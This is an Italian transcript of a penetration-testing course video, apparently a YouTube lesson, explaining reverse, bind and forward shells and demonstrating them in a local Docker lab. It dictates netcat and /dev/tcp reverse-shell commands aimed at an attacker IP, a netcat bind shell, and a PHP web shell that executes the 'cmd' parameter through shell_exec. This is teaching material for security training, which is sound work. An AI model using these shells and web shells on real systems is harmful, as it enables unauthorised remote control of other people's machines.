Ciao a tutti e bentornati sul canale oggi faremo un'introduzione alla ebbene sì signori ci siamo come potete vedere qui abbiamo già fatto un po' di strada abbiamo fatto i concetti basici abbiamo fatto tutta la fase di riconoscimento abbiamo visto come funzionano i docker e abbiamo visto l'enumerazione dei servizi più comuni e anche di CMS, i gestori di contenuti più comuni Adesso quello che tocca è fare una piccola introduzione all'esplotazione e dopodiché si parte con OWASP Top 10 e vulnerabilità web. Come avete visto nel video precedente vi ho eh, esortato e consigliato di cominciare a prendere appunti ed è quello che sto facendo anche io. Questa prima introduzione parleremo di shell Parleremo della Reverse Shell, della Bind Shell e della Forward Shell. Dopodiché andremo a parlare dei vari tipi di payload, di come si enumera un sistema, e daremo una bella ripassata a Bursuit, perché finiti questi eh, piccoli passi, cominceremo con tutte queste vulnerabilità. E useremo moltissimo Bursuit, perché la maggior parte di queste vulnerabilità sarà hacking web. Pertanto, prima di proseguire, andiamo a ricapitolare quello che abbiamo fatto fino adesso e andiamo a ricapitolare come funziona una fase di pentesting, una fase di penetration testing. La prima fase, come abbiamo detto, è la fase di riconoscimento e se vogliamo è anche una delle più importanti e a volte è anche quella che ci prende più tempo, perché la cosa più importante di tutte nella fase di riconoscimento che già abbiamo visto Reperire più informazioni possibile riguardo il nostro obiettivo, dopodiché c'è la fase di enumerazione. Dobbiamo enumerare a bestia cercare di capire il più possibile tutto: se c'è un CMS su questa macchina, se c'è un WordPress, se c'è un sito, <coughs> se ci sono delle directory, se ci sono delle risorse. Dobbiamo enumerare tantissimo anche la fase di enumerazione. Ci vuole il tempo che ci vuole. Ci sono enumerazioni che durano 10 minuti, ci sono enumerazioni che durano 10 giorni. Non ha importanza quanto duri la fase di enumerazione o e o la fase di riconoscimento. Sono due fasi importanti e basilari. Il tempo che ci vuole, ci vuole. Dobbiamo capire che servizi ci sono, che tecnologia c'è, eh, tutto quanto. Fatto questo. Avendo preso tutte queste informazioni si comincia a cercare le vulnerabilità, ossia la fase dove entriamo adesso. Quindi l'ho detto, adesso siamo alla fase di esplotazione. Abbiamo fatto la fase di riconoscimento, di enumerazione e adesso siamo all'esploitazione. Dobbiamo andare a cercare quale vulnerabilità, quali exploit ci sono per questa macchina che stiamo attaccando. Spesso e volentieri dovremmo crearci noi un exploit. E durante eh, tutto questo corso vedremo anche come, perché vedremo sia l'esplotazione eh, automatizzata con dei strumenti che appunto automatizzano l'esplotazione, ma vedremo moltissimo l'esplotazione manuale, ossia ci andremo noi a creare i nostri script, i nostri strumenti che ci servono per andare a compromettere una macchina. L'obiettivo è sempre lo stesso, riuscire a prendere possesso della macchina vittima, a comprometterla, o anche a riuscire a prendere delle informazioni privilegiate, delle credenziali e quant'altro. A volte basta andare a prendere possesso del server e non entrare proprio nella macchina, anche questo lo vedremo più avanti. O magari semplicemente eh, riuscire a compromettere un'interfaccia amministrativa di un servizio o di quello che sia. Tutta questa parte di attacco, tutta questa eh, fase di attacco è quella che andiamo a cominciare adesso. Nei video precedenti abbiamo parlato spesso delle shell, abbiamo utilizzato già nei video precedenti per esempio la reverse shell, ma ci sono anche altri tipi di shell e questi tre tipi di shell li andremo a vedere in questo video. Questa parte è molto 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 importante. Come al solito le basi sono sempre molto molto importanti, lo dico sempre, senza quelle non si va da nessuna parte, eh, se, non, se non si può fare una casa dal tetto, come si suol dire. No? Dunque, per andare a capire la differenza tra questi tre tipi di shell, andremo a utilizzare Excali che è un, una piattaforma gratuita che ci permette di fare dei grafici, dei disegni, dei diagrammi. E una volta che abbiamo capito come si crea una connessione e quali tipi di shell possiamo utilizzare e sappiamo utilizzarli, possiamo già passare a parlare un pochino dei tipi di payload, dell'enumerazione di sistema, rivedere un attimino Bursuit un po' più da vicino e poi buttarci nelle vulnerabilità. Siamo già arrivati quasi a 35-40 video e ancora non avevamo toccato nulla eh, di intrusivo, di attacco. Questo perché? Perché abbiamo fatto una fase di apprendimento di tutte le basi molto molto dettagliata e questo adesso che andremo a fare la fase di attacco ve la ritroverete perché capirete le cose con molta più semplicità. Ma adesso basta Bando alle ciance, spostiamoci su Excalidraw e andiamo a conoscere le tre shell che useremo. Dunque andiamoci a creare uno scenario che ci aiuta a capire queste shell che andremo a vedere. Mettiamo due computer, uno lo facciamo verde, uno lo facciamo rosso ci prendiamo la scritta qui e scriviamo attaccante la facciamo un po più carina ok va bene così e lo mettiamo sopra mentre invece di qua ci andiamo a mettere vittima la facciamo verde e ce la spostiamo un pochino meglio un po più allineato no Ok, dunque diciamo che la macchina vittima è una macchina Linux, no? Prendiamo questo, lo mettiamo qua. Però, okay, sinceramente se è Windows o Linux non cambia nulla, è la stessa cosa. Diciamo che in questa macchina vittima sta ehm, rannando un server, un server in Apache 2, ok? E questo servizio, questo server, dà come servizio una pagina web, ok? Mettiamo un delimitatore qui e qui ci mettiamo la pagina web, ok? Questa pagina è sulla porta 80. Questo lo prendiamo e lo mettiamo al servizio, lo mettiamo un po' più grande, ok? Pertanto, per cominciare, io come attaccante riesco. A vedere la pagina web sulla porta 80 comincio a fare la fase di riconoscimento e comincio ad enumerarla cercando delle vulnerabilità per riuscire poi a esplotarla e a riuscire ad avere accesso alla macchina vittima. Una cosa importante da tenere in conto è che mh, questo sito è un processo, se vogliamo, un servizio con un processo, per esempio, eh, il server Apache 2 che tiene su questo sito sarà stato lanciato, avviato probabilmente con un eh, server start Apache 2 da eh, un user e il proprietario di questo servizio sarà l'user che ha startato il servizio. Ossia, se per esempio lo ha avviato Root, Root sarà il proprietario. Solitamente. Quando andremo a vedere, a incontrare Apache 2, troveremo sempre l'user W data. Solitamente è questo che si incontra. Scriviamolo qua perché tanto eh, lo troverete moltissime volte. L'user wwwdata. Ok? Questo lo mettiamo in bianco. E perché troviamo questo? Troviamo questo perché questo è un user di sistema. Se voi andate su Linux e andate a vedere eh, il file etcpasswd, troverete questo user qui, www.data. E solitamente questo è l'user di sistema che va a gestire, a gestire tutta quella, quella parte del servizio web. Quindi il server, l'http, il website e quello che sia. Ora facciamo conto che noi abbiamo trovato una vulnerabilità che ci permette di eseguire dei comandi in questo sito e se noi andiamo a fare a eseguire dei comandi dovete tenere in conto che questi comandi verranno eseguiti come www data ossia come l'user che è il proprietario del servizio che siamo riusciti a esplodare pertanto se io riesco a compromettere questa web che è il proprietario è l'user di sistema www.data. Una volta che io faccio dei comandi o quello che sia, io sarò www.data. Se per esempio questo servizio lo tirava su root, io, una volta che sono riuscito a comprometterlo, sono dentro come root. Ora, questo perché? Perché quante volte avete fatto qualche macchina, eh, riuscite ad avere una shell. E vedete che nella shell voi siete l'user appunto www-data. Quindi una volta che abbiamo la possibilità di riuscire a iniettare dei comandi, noi possiamo dare dei comandi sciolti come per esempio whoami o ls o quello che sia. Però l'obiettivo qual è? L'obiettivo è dargli un comando per far sì che ci spona eh, ci dà una shell, ossia una console interattiva. Quindi una delle cose che cerchiamo sempre di fare è cercare di approfittare del fatto che possiamo, siamo riusciti a iniettare comandi in questa web. Quello che vogliamo è che con i comandi che noi mettiamo, non solo quelli sciolti di cui abbiamo parlato prima, ma con un comando noi riusciamo a farci mandare una shell dal server, una console interattiva. Questo può succedere per qualsiasi protocollo, per TCP, per UDP o quello che sia. Pertanto, questa storiella che iniettando del codice nella web noi riusciamo a farci mandare una console interattiva dal sito, dalla macchina, a noi, beh, questa, questa è una reverse shell. E come avviene questo processo? Beh, questo processo normalmente avviene in questa maniera, ossia io come attaccante con uno strumento che è Netcat, e questo lo vedremo a breve, posso andare a mettermi in ascolto su una porta, per esempio la porta 443, no? Prendo e mi metto in ascolto su questa porta e mi metto in attesa di ricevere una connessione. E una volta che siamo in ascolto noi possiamo andare a iniettare dei comandi sulla macchina vittima per esempio utilizzando proprio Netcat, ma ce ne sono tante altre che andremo a vedere, quindi potrei dirgli nc-e e gli dico mandami una bash, mandami una console interattiva bash e gli dai l'IP tua, spostiamo questo un attimino più in qua, bbash, metti IP attaccante, alla porta 443. Quindi, questo è il codice che vado a iniettare nella web dopo che mi sono messo in ascolto e lei mi manda una console interattiva. Naturalmente io eseguo questo comando nella macchina vittima perché abbiamo già detto che siamo riusciti a entrare. Quindi, lo eseguo, lo eseguo io questo comando sulla macchina vittima. Come dicevo prima, ci sono tanti altri comandi che si possono andare a iniettare. Per esempio, possiamo fare un bash meno i gli facciamo maggiore appersan, eh, qui è meno, meno i maggiore appersan e gli diciamo eh, dev tcp. Mettiamo l'ip attaccante, quindi la mia ip che attacco, e qui mettiamo la porta quella che vogliamo, e dopodiché gli facciamo 0 maggiore e facciamo il ridizionamento con l'appersan A1. Questa per esempio è un'altra iniezione di codice che ci permette di eh, farci spawnare, farci mandare una console interattiva. Ora, questo si può fare in tantissimi modi, si può fare anche con Bash, si può fare con Python, si può fare con PHP, però, e eh, lo vedremo, più avanti vedremo tutto nel dettaglio. La cosa importante, il concetto che dovete capire adesso, è che una volta eseguito questo comando, io, attaccante, eseguo questo comando nella macchina, l'user www.data mi va a mandare a me una console interattiva. E me la manda sulla porta, per esempio, 443. Qui dovrei andare a mettere, invece che porta, il mio IP e la porta 443, per esempio, no? E così lui, su questa porta, mi invia la console interattiva perché io sono in ascolto, aspettando. E questo è il concetto della reverse shell. Adesso possiamo andare a vedere che cos'è la bind shell, perché naturalmente è un concetto differente. Con la bind shell questo processo non c'è, ossia tu non vai a eh, farti mandare una console interattiva dalla macchina vittima. Con la bind shell tu la shell ce l'hai direttamente nella macchina vittima. Magari puoi dirgli come comando netcat-nlvp alla porta 443 che dicevamo prima e poi gli dici ehi perché non mi offri una bash, una shell bash così. In pratica tu vai a eseguire questo dalla macchina vittima per andare ad aprire una porta, in questo caso la 443, quindi apri una porta eh, temporanea in modo tale che adesso la macchina non ha più solamente l'80, ha aperto anche la 443. Ok? Tu ti vai a connettere con Netcat, vai a fare un eh, NC e poi metti l'IP della macchina vittima alla porta abbiamo detto 443. Quindi ti vai a connettere all'IP della macchina vittima tramite questa porta che tu hai aperto qua sotto. Hai aperto la 443 della macchina vittima quindi ti connetti, e nel momento che tu ti connetti, hai già una console interattiva, una shell. Pertanto, la prima differenza tra queste prime due shell è che io non sto chiedendo alla macchina vittima di mandarmi una console come abbiamo visto nella reverse shell, ma io qui mi connetto alla macchina vittima e ho già la console, questa è la bind shell. E adesso c'è la terza shell, ossia la forward shell. Abbiamo visto la reverse shell, abbiamo visto la bind shell, adesso vediamo la forward shell. Per quanto riguarda la forward shell entra in gioco una cosina in più. E questa cosina in più è, possiamo dire, una specie di firewall. In informatica i firewall sono dei sistemi di sicurezza di rete che mh, sorvegliano, controllano il traffico di rete sia in entrata che in uscita. E sono soggetti a delle regole. Ogni firewall viene configurato con determinate regole. E grazie a queste regole che vengono configurate, il firewall fa una barriera. Una barriera a protezione della macchina. Per esempio, ritorniamo al discorso della reverse shell. No? Noi siamo entrati, abbiamo eseguito un comando e stiamo in ascolto per farci mandare una console interattiva dalla macchina. Ma fate conto che questa ehm, console, ho fatto un casino, ok? Basta. Fate conto che questa ehm, console non arriva. C'è qualcosa che impedisce che la macchina vittima ti invii questa console interattiva. Sta bloccando, qualcosa sta bloccando questa connessione TCP UDP o quello che sia, indipendentemente dalla porta che sia l'80 la 443 o quello che sia, però questa connessione è bloccata. Questo succede perché magari per esempio con IP tables sono state configurate una serie di regole, quelle che dicevamo prima, eh, in modo tale che eh, la macchina vittima non può inviarti la console interattiva. Magari c'è una regola su questo firewall, su questo iptables che blocca il traffico in uscita ed è per questo che non ti arriva eh, la reverse shell. Ed è qui che entra in gioco la forward shell. La forward shell utilizza un giochino con mkfifo e grazie a questo riesce a creare dei file temporanei con il quale gioca. In pratica grazie alla creazione di queste risorse, di questi file, FIFO, anche eh, named pipe, si crea una console eh, simulata. Quindi riesce ad avere un output, abbiamo detto che l'output principale è stato bloccato dai p-tables, da delle configurazioni, però con questa maniera, grazie a mkFIFO, riusciamo a, ad avere una console simulata e pertanto ci dà la possibilità anche stavolta di operare nella macchina in remoto. Perché questo? Perché appunto questa risorsa FIFO ridirige il traffico in uscita e ci permette, ci fa tornare alla bidirezionalità della comunicazione, ossia ci permette di riavere un output dalla macchina vittima. Ora, il concetto di forward shell è... In, nella teoria è un pochino più complicato ma noi lo andremo a vedere nella pratica e sarà molto molto più chiaro comunque adesso per la teoria eh, potete semplicemente mettere nel cervello che la forward shell è molto utile quando abbiamo un blocco quando abbiamo un firewall, quando abbiamo un qualcosa eh, che ci blocca la connessione che non ci fa avere una reverse shell o quello che sia e quindi questi sono i concetti teorici per quanto riguarda la reverse shell, la bind shell e la forward shell. Adesso quello che andremo a fare lo andremo a vedere nella pratica. Andiamo in console. Ok, allora, tanto per cominciare, creiamoci un ambiente di lavoro e ci andiamo a creare un Docker file per tirarci su un Ubuntu. Vediamoci questo dollaro alla fine con set no list e eh, andiamo a, appunto a crearci un Docker image, un Docker file per tirarci su un contenitore <coughs> e fare alcuni esempi per vedere questi tre tipi di shell. Possiamo, per esempio, fare from um, e mettiamo un Ubuntu, Ubuntu mettiamo latest, così ci mette l'ultima versione. Dopodiché, possiamo fare un env eh, debian front end e mettiamo non interactive questo ve lo ricordate per far sì che quando installiamo il contenitore non ci comincia a chiedere la regione eccetera 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 dopodiché vogliamo che quando lo startiamo faccia subito un apt, un apt update e gli facciamo fare anche un apt install e andiamo a installare apache2 in modo tale che abbiamo già questo servizio e andiamogli a mettere anche php che altro ci potrebbe servire uh, um, vabbè quello che ci serve lo possiamo mettere lo possiamo installare successivamente dopodiché gli facciamo un expose 80 in modo tale che andiamo a esporre la porta 80 dove appunto abbiamo il nostro Apache e poi gli diamo l'entry point in modo tale che in automatico ci tira su Apache, quindi facciamo service eh, Apache 2 start. E gli diciamo anche che ci deve spawnare una console interattiva, quindi facciamo un bin bash. E io credo che per cominciare eh, questo basta, poi ripeto quello che ci serve lo installiamo man mano che eh, andiamo avanti. Quindi questo ce lo andiamo a salvare e, e andiamo a creare una... Ah, non mi dai permessi perché chiaramente non sono come sudo. Quindi facciamo una cosa. Copiamoci questo. Da qui usciamo. Ci apriamo un'altra console. E ci mettiamo come root. Ci apriamo al volo e eh, ce ne andiamo nella cartella che ci interessa. Ci apriamo il volo nano, docker file, ci copiamo quello che abbiamo fatto fino adesso e ce l'andiamo a salvare. Facciamo un ctrl x, yes, ok, e ce l'abbiamo qua. Vediamo intanto se abbiamo già qualche contenitore che sta correndo, e eh no, non abbiamo nulla, perfetto. Gli andiamo a dare un docker build, questo già lo avete visto, lo sapete, t, e lo chiamiamo eh, myimage. Gli diamo il punto perché il file è presente in questa cartella aspettiamo che fa le sue cosine. Ok. Se facciamo un docker images, vediamo che abbiamo la nostra immagine. Eccola qua. Ne abbiamo anche altre che andrebbero cancellate dei video precedenti, Joomla, Magento, Drupal, poi le cancelleremo. Però adesso quello che ci interessa a noi è questo. Quindi adesso lo andiamo a startare, facciamo un docker run, anche questo già lo sapete, utilizziamo il DIT ossia che vogliamo che vada in secondo piano e che ci dia una console interattiva, gli andiamo a dire come al solito che voglio che il port 80, la porta 80 si converta sia la mia porta 80, poi gli andiamo a dare il nome, chiamiamolo my, uh, my ok? E poi l'immagine che vogliamo utilizzare, my image. Andiamo all'enter ed ecco qua. Adesso gli diamo un Docker PS, e vediamo che è qui pronto e bello. E vediamo anche che c'è il port forwarding 8080. Adesso andiamo a fare un docker exec-it, eh, poi mettiamo il nome, che è mycontainer, e gli diciamo anche eh, bash per spawnarci eh, la console. Gli diamo enter e vediamo che siamo già dentro al nostro contenitore. Adesso attenzione. Se io qui sotto mi metto sempre come eh, root e mi metto in ascolto con Netcat, con il parametro nlvp nella porta 443, e voi direte cosa sono questi parametri, se ci apriamo un'altra console e andiamo a fare un man Netcat, ci tira fuori tutte eh, le opzioni. E qui possiamo andare a vedere perché che cosa sono queste opzioni qui. Per esempio guardate il L. Il l è per far sì che non ci applica la risoluzione DNS. Poi abbiamo la L, andiamocela a cercare. E il modo listening, quindi è per mettersi in ascolto. Abbiamo la V di Verbose, che è qui, quindi che ci riporti subito tutto. E poi abbiamo la P che è per andare a dargli la porta, eccola qua. Meno P. Questo, questi sono i parametri che vengono sempre utilizzati quando ci si mette in ascolto con netcat okay? naturalmente come sapete i eh, contenitori quando li tiriamo su vengono nudi non hanno niente quindi tanto per cominciare ci serve netcat nel contenitore quindi facciamo un apt install e gli diamo ncat diamo yes e lo andiamo a installare Ok. Adesso che l'abbiamo installato, sotto ci andiamo a mettere in ascolto. E poi al contenitore andiamo a dire oh netcat -e per andarci a eh, creare una bash, una console interattiva e inviarcela a noi. Questo primo esempio è la reverse shell. Quindi andiamo a dare bin bash bin bash e dobbiamo andare a dargli l'IP ricordatevi che adesso siamo in docker quindi andiamoci a vedere l'ip apriamo un'altra console e facciamo un ifconfig e vediamo qui la docker 0 pertanto la mia ip qua è questa, la 17.01 quindi qui vado a mettere vado a mettere la mia ip 172.0 172 no, 17.0 1. e dove siamo in ascolto sulla porta 443, quindi mettiamo la porta 443. E guardate, se adesso gli do enter, sotto faccio un U a mai, e sono root, se faccio un host name meno i, vedete che io sono dentro la 1702. La 1702 è il contenitore, perché la mia è la 1701. Se vogliamo vederlo un pochino meglio possiamo fare uno script, andiamo al dev null e facciamo un meno c bash. E vedete che adesso lo vediamo in una maniera un po' più carina. E se vedete siamo dentro il contenitore. È lo stesso, vedete? E come abbiamo detto prima nella teoria, quando tu vai a, fare, eh, a mandarti questa reverse shell, tu diventi il proprietario di questo servizio. In questo caso il proprietario di questo servizio è root. Quindi adesso noi siamo rotta. E questo è quello che è una reverse shell. Adesso se vogliamo andare a fare una eh, bind shell, usciamo da qui, diamo una pulita. Questa a fianco possiamo andare a chiuderla. Torniamo al contenitore e sempre con Netcat quello che posso fare è NLVP, abbiamo visto prima cosa sono questi parametri, mettermi in ascolto nella porta 443. Però questa volta offrendo una bash, la sto offrendo. Quindi bin bash. Gli diamo enter. E come vedete adesso noi stiamo offrendo una bash dal contenitore. Quindi se io vado sotto la mia macchina, è sempre con Netcat, gli do l'IP del contenitore che è 172.17.0.2, perché la nostra era la .1, e naturalmente gli do la porta che abbiamo scelto che è la 443. E se io gli do enter, e se adesso faccio un U mai, root e se faccio un host name meno i sono dentro la 172 la 1702 ossia dentro il contenitore quindi anche qui anche stavolta sono dentro la macchina vittima però questa volta mi sono semplicemente connesso non mi sono inviato una reverse shell anche qui se andiamo a fare uno script dev null meno c bash vedete che siamo dentro eccolo qua Normalmente poi se facciamo un CTRL C e usciamo devi tornare a riconnetterti perché questa porta temporale che tu hai aperto qui appunto è una porta temporale la 443 una volta che esci si chiude e questa era la bind shell adesso andiamo a vedere l'ultima l'ultima che è la forward shell dunque per vedere la forward shell dobbiamo andare a ehm, configurare delle regole nel nostro contenitore ossia lo dicevamo prima no? la forward shell la facciamo quando hai un firewall o quando hai qualche regola che non permette per esempio che il traffico <coughs> vada in uscita solitamente per fare questa cosa si utilizza ip tables, naturalmente è un altro strumento che nel contenitore non abbiamo perché sappiamo che il contenitore esce sempre nudo, lo dobbiamo installare tutto quanto noi quindi quello che dobbiamo andare a fare tanto per cominciare è andarci a installare IP p tables però il problema è che i p tables spesso dà problemi e dà limitazioni ora intanto andiamocelo a mettere andiamo yes e lo installiamo ok il problema è che per utilizzare i p tables quando andiamo a fare il contenitore bisogna mettere delle flag addizionali che noi non abbiamo messo per esempio la regola che voglio mettere è che la porta 80, dove abbiamo il servizio a sia eh, visibile, però voglio che tutto il resto delle connessioni sia bloccato. Il problema che vi dicevo prima è, per esempio, se facciamo un IP tables, gli diamo un flush, che è per dare una pulita, gli diamo enter e vedete che ci dà un problema, ci dice permission denied, you must be root. Il problema è che io sono root. Pertanto fa questo perché entra in conflitto e come dicevamo prima per andare a utilizzare questo strumento noi dobbiamo andare a startare il contenitore con una flag addizionale. Come sempre la cosa più importante di tutte, anche di imparare l'hacking, è imparare a risolvere i problemi. Per esempio io ho questo errore, me lo prendo, me lo copio e mi apro un Firefox, no? Aperto il Firefox, me ne vado sul santo Google, dove qui troviamo tutto e l'abbiamo capito, e mi copio questo errore. E vedete qui, già qui ci dice qualcosa, could not fetch rullets, ed è la stessa cosa che abbiamo qua. In più qua sopra, guardate, IP tables in Docker container. Io non ho messo nessuna scritta di Docker, ho solo messo l'errore che mi dava, quindi... Questo sta sempre a rappresentare che qualsiasi problema avete, qualsiasi cosa che non conoscete, non sapete, aprite Google. E se andiamo a vedere in questa pagina ci dà la flag che ci serve per lanciare il container e avere la possibilità di utilizzare i Ptables senza conflitto. Ed eccola qua, vedete? meno meno cap adnet admin. Questo ce lo copiamo. Qui possiamo andare a chiudere. Usciamo dal contenitore e andiamo a fare un docker ps e andiamo a stoppare il nostro contenitore. Quindi andiamo a fare un docker stop my container e aspettiamo che ci stoppa, ci tira giù, ci leva il contenitore. Potevamo anche fare un meno meno force per farlo immediatamente, però ha fatto, ok facciamo un docker ps-a e dopodiché andiamo a fare un docker anzi facciamo così che facciamo prima meno a meno q questo lo mettiamo tra parentesi gli mettiamo il dollaro e poi gli diciamo un docker rm gli diamo enter e così facciamo un po' di pulizia e cancelliamo tutto. Ok. E adesso andiamo a fare un... Ehm, dove avevamo il docker file in corso hacking, in shell. Eccolo qua, ok. <coughs> Quindi adesso andiamo a rifare un'altra volta un docker run con il meno dit che già sappiamo che cos'è quali opzioni sono, gli andiamo sempre a esporre la porta 80, e gli andiamo a dare sempre lo stesso nome, ossia my container, di cosa della my image. Però gli andiamo ad aggiungere e a copiare la flag che abbiamo preso in quel sito. Gli diamo enter, e ok, ora già così, docker ps, abbiamo il nostro contenitore, e abbiamo aggiunto questa flag che ci serviva. Quindi rifacciamo un docker exec per andare a rimetterci dentro al contenitore. Quindi my container e gli diamo una bash. Ed eccoci qua. E adesso andiamo a controllare se abbiamo risolto. Quindi facciamo un iptables flush e vediamo se ci dà lo stesso errore. E no, non ce lo dà. Dunque adesso dobbiamo andare ad accettare tutte le connessioni però solo sulla porta 80. Pertanto andiamo ad impostare una regola, adesso non scenderemo troppo nel dettaglio per i p perché tanto comunque non è che sarà utilizzato, facciamo un meno -a, un meno -a input, poi gli diamo -p-tcp per il protocollo appunto tcp dove gli diamo -d-port. Sulla porta quale? Quella che ci interessa? L'80-J, accept. Con questa regola andiamo ad accettare tutto il traffico sulla porta 80. Mi diamo enter ed è tutto ok. Adesso però tutto il resto di connessioni io lo voglio bloccare. Pertanto gli andiamo a dare lo stesso comando, però questa volta gli diciamo che dalla porta 0 alla porta 6500... 35, ricordiamo che le porte sono 6535, facciamo un meno m con track, meno meno c state new, gli diamo meno j e gli diamo drop. E come vi dicevo questi sono comandi molto molto specifici di P-Table, se non scendiamo nel dettaglio non servono. Però se volete comunque andare a capire un pochettino di più potete cercare su, su Google e mettete come bloccare una connessione o come bloccare tutte le connessioni e vi uscirà sicuramente tutti i dettagli e questi comandi qui che stiamo utilizzando. Alla fine stiamo toccando i P-Tables solo per andare a settare una configurazione tale che ci permette di andare a praticare con la forward shell, ossia quello che dicevamo prima, no? Ok, mi diamo enter. E adesso per esempio ce ne andiamo, ci apriamo un'altra console, o qui al lato, e andiamo a fare un Docker PS e un Docker Port my container E vediamo che la porta 80 è la nostra porta 80. Pertanto se io questa me la chiudo, mi apro un Firefox. me ne vado su localhost localhost che di default è la porta 80 qui c'è la 8080 dell'altro video vediamo che abbiamo apache2 che sta girando di default quindi funziona e la vediamo pertanto adesso andiamo dentro al contenitore e ce ne andiamo esattamente nella cartella dove c'è questo servizio che se vi ricordate è sempre la stessa quindi var www. HTML facciamo un ls, vediamo la index, eccola qua, è questo che stiamo vedendo sulla destra. Allora voi supponete che in una, in una maniera qualsiasi siamo riusciti a uploadare un file PHP nella macchina vittima, in modo tale che adesso possiamo vedere l'esempio della Forward Shell. Installiamoci anche nano sul contenitore perché, naturalmente, non c'è. apt install nano. Ok, qui possiamo chiudere. E adesso ci andiamo a creare un file nano cmd.php. Questo tipo di file l'abbiamo già visto in altri video e dovremmo già sapere a che cosa serve. Adesso andiamo a fare un piccolo script in php che, ripeto, avevamo già visto in altre occasioni che ci permette di eseguire comandi sulla macchina vittima, no? Ve lo ricordate? gli diamo un tab e cominciamo a dargli tanto per cominciare eh, gli diamo l'etichetta formattata in modo tale che l'output si vede in una maniera migliore quindi facciamo un pre e chiudiamo andiamo a chiamare la funzione shell exec per andarci a eseguire un comando a livello di sistema ossia quello che io voglio fare tramite una petizione di tipo get voglio andare a utilizzare il parametro cmd per controllare il comando che voglio eseguire. A questo gli andiamo a concatenare eh, per chiudere l'etichetta eh, formattata, quindi facciamo pre e chiudiamo punto e virgola. Queste etichette eh, formattate le mettiamo perché ci aiutano a vedere l'output in maniera appunto formattata, in maniera leggibile e non tutto su una riga. Ci salviamo questo file, facciamo un LS e ci andiamo a cancellare l'index, facciamo un RM, index html. Ci andiamo su un'altra pagina e ci andiamo a riaprire un'altra volta il Firefox. Torniamo su localhost, eh, mi mette sempre l'8080, ma a noi ci serve l'80, quella di default, e vediamo che non c'è più l'index di Apache, ma c'è il nostro file, chcmd.php. Ci clicchiamo, e eh, attenzione però, non ci sta interpretando il PHP, ma noi il PHP l'abbiamo installato nel contenitore, no? Vediamo un po'. Io ricordo che l'avevamo installato, se facciamo un Witch PHP, sì, è installato. Beh, abbiamo un problema e quando abbiamo un problema <coughs> sappiamo già cosa dobbiamo fare. Se per esempio io me ne vado su Google e vado a cercare Ubuntu Apache PHP not working. E vediamo un po'. Vediamo qui. PHP script not executive. <coughs> e vediamo che qui questo che risponde ci dice che dobbiamo andare ad abilitare un po' di librerie per esempio PHP 5 già ce l'abbiamo messo però non abbiamo questo andiamoci a installare questo e poi a vedere se funziona quindi facciamo un apt install install questo che ci siamo appena presi se no installation candidate ha un pacchetto che l'ha perso. Proviamo a darglielo tutto, vediamo un po'. Vediamo adesso. Vabbè, ah sudo naturalmente non c'è bisogno. Siamo già a root. Continua a darci il php5 se mettiamo solo questo. Vediamo se adesso ce lo interpreta. Torniamo sul localhost. Aggiorniamo. No, continua a non interpretarci il PHP. Proviamo a andare a restartare il servizio. Facciamo un service Apache DOS restart. Ok. Torniamo alla pagina e vediamo se ce lo interpreta. Aggiorniamo. No ma ancora non ce lo interpreta andiamo a rileggere un attimino qui allora se c'è qualche cos'altro qui per esempio ci sta dicendo che ci dobbiamo ap aprire il file phpini con nano e andare a mettere questa opzione che è off la dobbiamo andare a mettere su on proviamo Naturalmente qui vediamo che c'è un PHP 5.6. Sicuramente la nostra versione è un'altra. Andiamo a vedere tabulando se ce la dà. Facciamo un Nano ETC PHP versione 8.1. Sì, poi mettiamo Apache DOS. Ok, gli sto dando a tab in modo tale che ci prende in automatico quello dove dobbiamo andare. il PHPini, ce l'apriamo. Facciamo un CTRL W e andiamo a fare un search per short-basso-open-basso-tag. Che è quello che ci diceva nel, nel file, nel sito. E qui abbiamo short-open-tag-off. Questo è quello che ci diceva che dobbiamo andare a cambiarcelo in on. Proviamo mettiamo on, salviamo e usciamo. Adesso facciamo un'altra volta un server restart di Apache, torniamo alla pagina e vediamo se adesso ce lo sta interpretando. Aggiorniamo e ok, adesso ce lo interpreta, vedete. Pertanto adesso se io qui a localhost vado a fare un punto interrogativo, prendo il mio comando cmd e gli faccio uguale, non so, uamai. Ok, vedete che qui ce lo sta interpretando. Se faccio un PVD, eccolo qua, var whtml. Ok, questo l'abbiamo risolto. E come avete visto, abbiamo risolto con. Internet, grazie a internet, è questo io che sempre faccio riferimento, se avete un problema, una cosa che non capite, che non conoscete, se vi sorge un problema durante una qualsiasi cosa, prendete l'output che, che vi esce, eh, l'errore, e andate a cercare su Google, su Google c'è tutto. Ora eh, andiamo a mettere un attimino in modo scuro perché se no mi esce il sangue dagli occhi, vi ingrandiamo un po'. Quindi fino adesso sappiamo che io posso andare a eseguire comandi qui. Se io faccio un ls-l, vedete che me lo interpreta e mi esegue i comandi. E lo vediamo anche bene. Perché questo? Perché abbiamo utilizzato le etichette preformattate, quelle che abbiamo visto prima nello script. Se per esempio io qui vado a fare un mm, ps-faux, vedete che L'output è bello ordinato. <ride> se non avevamo messo quelle, quei tag nello script, lui ci avrebbe rappresentato questo output tutto quanto in una linea, quindi molto difficile da comprendere. Ok, allora torniamo al contenitore e andiamoci a installare, tanto per cominciare come al solito, ncat. Andiamo a yes. E ok. Ora se mi apro un'altra console. E mi metto in ascolto sulla porta 443 che è la solita naturalmente dobbiamo metterci come root e facciamo un'altra volta un netcat meno nl vp sulla porta 443 ci mettiamo in ascolto e se vado sul sito e gli dico mm, cmd CMD uguale la mia IP, la vado a mettere dopo che gli do un netcat-e e gli chiedo un bin bash una console interattiva al 172.17.0.1 che è la mia IP sulla porta 443 dove sono in ascolto. Adesso in teoria non dovrei poter ricevere la shell. Andiamo a vedere. Invece l'ho ricevuta, quindi c'è ancora qualcosa che non va. Ok, allora andiamoci a impostare un'altra regola con ipTables. Reimpostiamo un'altra volta ipTables meno A output meno P protocollo TCP meno O e poi questa volta gli andiamo a dare l'etch0. Questa dovrebbe essere eh, l'interfaccia di rete che viene utilizzata, S-Port sull'80, meno J, accept, accept. E poi andiamo a dare ancora IPTables, meno A output, meno O questa volta, sempre su 0 e gli diamo meno J drop. E con questo se torniamo alla web, qui leviamo tutto, ripartiamo dalla radice, e se gli diamo un comando, quindi cmd.php uguale uamai, ah, eh, non ho messo il punto interrogativo, cmd.php, punto interrogativo cmd. Uguale. Vedete che adesso non me lo permette. Finalmente siamo riusciti. Se, per esempio, io mi rimetto un'altra volta in ascolto con NCAT con eh, NetCat, vado eh, al sito e gli ridò la, eh, il comando per mandarmi una shell e torno alla console, non ce l'ho. Vedete, siamo riusciti a bloccare la connessione. Adesso qui, finalmente, entra in gioco Forward Shell. Se ce ne andiamo a una repo... Eh, apriamoci un Firefox qua. E ce ne andiamo su github.com e andiamo su il repo di Savitar, che suppongo già tutti lo conoscete. 